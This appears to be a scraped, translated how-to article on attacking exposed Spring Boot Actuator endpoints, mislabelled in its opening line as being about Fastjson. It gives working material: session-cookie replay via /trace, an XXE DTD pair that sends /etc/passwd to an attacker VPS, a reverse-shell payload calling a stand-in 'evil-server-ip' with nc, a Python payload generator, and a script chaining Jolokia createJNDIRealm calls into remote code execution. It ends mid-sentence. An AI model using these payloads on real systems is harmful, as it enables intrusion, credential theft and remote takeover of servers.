2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Shulou(Shulou.com)05/31 Report--
Filed under the question of how to exploit the Fastjson deserialization vulnerability, this article actually walks through the exploitation of exposed Spring Boot Actuator endpoints in detail, in the hope of giving readers who face this problem a simple and workable method.
Preface
Actuator is the service monitoring and management middleware provided by Spring Boot. When a Spring Boot application starts, it automatically registers a number of endpoints with the routing layer. Misconfiguration of these endpoints can lead to security problems ranging from system information disclosure to XXE and even RCE.
Vulnerability discovery
There are usually two ways to tell whether a site is built on the Spring Boot framework.
1. The site's icon (favicon) is the green Spring leaf.
2. The distinctive default error page ("Whitelabel Error Page").
Affected versions
Spring Boot < 1.5: all endpoints are accessible without authentication by default.
Spring Boot >= 1.5: only the /health and /info endpoints are accessible by default, but this protection is usually switched off by application developers.
Endpoint description
The official documentation describes the function of each endpoint:
/autoconfig - provides an auto-configuration report recording which auto-configuration conditions passed and which failed
/beans - describes all beans in the application context and the relationships between them
/env - returns all environment properties
/configprops - describes how configuration properties (including default values) are injected into beans
/dump - takes a snapshot of thread activity
/health - reports the application's health indicators; the values are provided by HealthIndicator implementation classes
/info - returns customised application information, provided by properties prefixed with info
/mappings - describes all URI paths and their mapping to controllers (including the Actuator endpoints)
/metrics - reports various application metrics, such as memory usage and HTTP request counts
/shutdown - shuts the application down; requires endpoints.shutdown.enabled to be set to true
/trace - provides basic HTTP request tracing information (timestamps, HTTP headers, etc.)
In Spring Boot 1.x the endpoints are registered under the root URL.
In Spring Boot 2.x the endpoints were moved under the /actuator/ path.
The endpoint paths in this article are relative to the site root. In practice the endpoints may sit under a multi-level context path and have to be located by hand.
Visiting the /trace endpoint returns the most recent requests received by the server.
If it contains requests from a logged-in user, that user's cookie can be replayed to take over the session.
Visiting the /env endpoint returns the environment properties.
Database account details leaked through /env
Jolokia endpoint exploitation
Most Actuator endpoints only support GET requests and merely display sensitive configuration data; if the Jolokia endpoint is exposed, however, it can be abused to cause XXE or even RCE.
reloadByURL method
Check the MBeans listed at /jolokia/list for the reloadByURL operation provided by the logback library (ch.qos.logback.classic.jmx.JMXConfigurator).
XXE exploitation
reloadByURL allows a logback.xml configuration file to be loaded from a remote URL, and the XML is parsed without any restriction on external entities, which results in an XXE vulnerability.
1. Create the logback.xml and fileread.dtd files.
In logback.xml, the external DTD address is the web server on the public VPS; the DOCTYPE references the parameter entities (%remote; %int; %trick;) that the DTD defines.
fileread.dtd defines those entities: one reads the target file, and the nested %trick; entity sends its contents to the VPS.
2. Upload the logback.xml and fileread.dtd files to the web directory of the public VPS.
3. Make the target load logback.xml remotely through the Jolokia exec endpoint (Jolokia encodes / in a path argument as !/):
http://www.xxx.com/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/114.x.x.x!/logback.xml
The contents of /etc/passwd are read successfully through the XXE.
Remote code execution
logback.xml also supports the insertFromJNDI tag, which loads a variable from JNDI; this gives an RCE vulnerability.
The RCE process is divided into four steps:
1. Construct a GET request to the target that makes it load the malicious logback.xml file from the external server.
2. While logback.xml is parsed, an InitialContext.lookup(URI) operation is eventually triggered, where URI is the address of a malicious RMI service.
3. The malicious RMI server returns a Reference object to the target. The Reference names a BeanFactory class that already exists on the target, together with the bean class name, attribute name and attribute value (here ELProcessor, x and eval(...)).
4. When the target performs the lookup(), it dynamically loads and instantiates the BeanFactory class and calls factory.getObjectInstance(), which instantiates the bean class named by the Reference through reflection and calls the setter for each attribute. In our case the final setter call executes the following:
ELProcessor.eval("\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc evil-server-ip port > /tmp/f']).start()\")")
ELProcessor.eval() evaluates the EL expression (here a reverse shell), which gives RCE.
1. Download the RCE exploit code (the Spring-Boot-Actuator-Exploit project).
Edit Spring-Boot-Actuator-Exploit\maliciousRMIServer\src\main\java\hello\EvilRMIServer.java.
Here you can change the port the RMI server listens on, and the address and port of the reverse shell.
2. Compile and package the Java code with Maven. Enter the Spring-Boot-Actuator-Exploit-master/maliciousRMIServer directory and run:
mvn clean install
When packaging succeeds, RMIServer-0.1.0.jar is created in the target directory.
3. Edit the contents of logback.xml so that insertFromJNDI points at the RMI service.
4. Upload RMIServer-0.1.0.jar to the public VPS and run it. When starting the RMI listener on the attacking machine, its public address must be given with -Djava.rmi.server.hostname=x.x.x.x:
java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar
5. On the VPS, listen with nc on the port chosen for the reverse shell:
nc -lvp 9998
6. Request the vulnerable URL (Jolokia encodes / in a path argument as !/):
http://x.x.x.x/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/114.x.x.x!/logback.xml
The reverse shell connects back successfully.
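The two reloadByURL payloads described above (the XXE logback.xml/fileread.dtd pair and the insertFromJNDI logback.xml used for RCE), plus the Jolokia exec URL that triggers the reload, as an added example. This is not code from the original article or from the Spring-Boot-Actuator-Exploit project; the host names, ports and file names are placeholders, and the Jolokia path encoding implemented here (/ becomes !/ and ! becomes !!) is the rule from the Jolokia reference manual.

```python
# Added example (not from the original article or the exploit project it uses):
# generate the XXE logback.xml / fileread.dtd pair, the insertFromJNDI logback.xml
# for the RCE, and the /jolokia/exec URL that makes the target fetch the file.
# Host names, ports and file names are placeholders.
import os


def jolokia_escape(segment):
    """Jolokia GET path encoding: '!' becomes '!!' and '/' becomes '!/'."""
    return segment.replace("!", "!!").replace("/", "!/")


def reload_by_url(target, xml_url):
    """URL that invokes JMXConfigurator.reloadByURL(xml_url) through /jolokia/exec."""
    mbean = "ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator"
    return f"{target.rstrip('/')}/jolokia/exec/{mbean}/reloadByURL/{jolokia_escape(xml_url)}"


def xxe_logback(attacker_host, dtd_name="fileread.dtd"):
    """logback.xml whose DOCTYPE pulls an external DTD from the attacker's web server."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE configuration [\n"
        f'  <!ENTITY % remote SYSTEM "http://{attacker_host}/{dtd_name}">\n'
        "  %remote;\n"  # fetch the DTD, which defines %file and %int
        "  %int;\n"     # expanding %int declares %trick with the file contents embedded
        "  %trick;\n"   # resolving %trick requests http://attacker/?<contents>
        "]>\n"
        "<configuration/>\n"
    )


def xxe_dtd(attacker_host, path="/etc/passwd"):
    """fileread.dtd: &#37; is '%', so the inner entity is only declared when %int; is expanded."""
    return (
        f'<!ENTITY % file SYSTEM "file://{path}">\n'
        '<!ENTITY % int "<!ENTITY &#37; trick SYSTEM '
        f"'http://{attacker_host}/?%file;'>\">\n"
    )


def jndi_logback(rmi_url):
    """logback.xml that makes the parser call InitialContext.lookup(rmi_url)."""
    return (
        "<configuration>\n"
        f'  <insertFromJNDI env-entry-name="{rmi_url}" as="appName"/>\n'
        "</configuration>\n"
    )


def write_payloads(webroot, attacker_host, rmi_url, path="/etc/passwd"):
    """Write both variants into the directory served by the VPS; returns the file names."""
    files = {
        "logback.xml": xxe_logback(attacker_host),
        "fileread.dtd": xxe_dtd(attacker_host, path),
        "logback-jndi.xml": jndi_logback(rmi_url),
    }
    os.makedirs(webroot, exist_ok=True)
    for name, content in files.items():
        with open(os.path.join(webroot, name), "w", encoding="utf-8") as fh:
            fh.write(content)
    return sorted(files)


if __name__ == "__main__":
    vps = "114.x.x.x"  # placeholder for the attacker's public VPS
    print(write_payloads("./www", vps, f"rmi://{vps}:1097/jndi"))
    print(reload_by_url("http://x.x.x.x", f"http://{vps}/logback.xml"))
    print(reload_by_url("http://x.x.x.x", f"http://{vps}/logback-jndi.xml"))
```

With the XXE variant the file contents travel in the URL of the callback request to the attacker host (a multi-line file such as /etc/passwd also tends to surface in the resulting parse error), so the VPS web server log is where to look. The JNDI variant only needs the RMI server from the steps above to be listening at the env-entry-name address.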
createJNDIRealm method
For the underlying principle, see "Attack Spring Boot Actuator via jolokia Part 2".
Check /jolokia/list for the createJNDIRealm operation provided by the org.apache.catalina.mbeans.MBeanFactory class; if it is present, JNDI injection may be possible, leading to remote code execution.
The exploitation process is divided into five steps:
1. Create a JNDIRealm.
2. Write contextFactory as RegistryContextFactory.
3. Write connectionURL as your RMI service URL.
4. Stop the Realm.
5. Start the Realm, which triggers the JNDI injection.
These can be replayed step by step in Burp, or executed directly with a Python script.
import sys
from pprint import pprint

import requests as req

url = sys.argv[1] + "/jolokia/"
pprint(url)

# 1. create a JNDIRealm attached to the Engine
create_JNDIrealm = {"mbean": "Tomcat:type=MBeanFactory", "type": "EXEC",
                    "operation": "createJNDIRealm", "arguments": ["Tomcat:type=Engine"]}
# 2. write contextFactory
set_contextFactory = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE",
                      "attribute": "contextFactory",
                      "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"}
# 3. write connectionURL: the public RMI service address
set_connectionURL = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "WRITE",
                     "attribute": "connectionURL", "value": "rmi://x.x.x.x:1097/jndi"}
# 4. stop the Realm
stop_JNDIrealm = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC",
                  "operation": "stop", "arguments": []}
# 5. start the Realm, which triggers the JNDI lookup
start = {"mbean": "Tomcat:realmPath=/realm0,type=Realm", "type": "EXEC",
         "operation": "start", "arguments": []}

exploit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]
for step in exploit:
    rep = req.post(url, json=step)
    pprint(rep.json())
Run the RMI service with the RMIServer-0.1.0.jar packaged earlier:
java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar
Listen with nc on the reverse shell port:
nc -lvp 9998
Send the requests with the Python script:
python exp.py http://x.x.x.x:8087
The reverse shell connects back successfully.
Spring Cloud env
When a Spring Boot application uses Spring Cloud components, the spring.cloud.bootstrap.location property exists, and RCE can be achieved by overwriting the spring.cloud.bootstrap.location environment property (it is written through the /env endpoint and takes effect after /refresh is called, at which point the attacker-controlled bootstrap configuration is fetched and parsed).
See https://www.anquanke.com/post/id/195929 for the vulnerability principle.
Exploitable versions
Spring Boot 2.x cannot be exploited successfully.
Spring Boot 1.5.x can be exploited with the Spring Cloud Dalston release train, but not with Edgware.
Spring Boot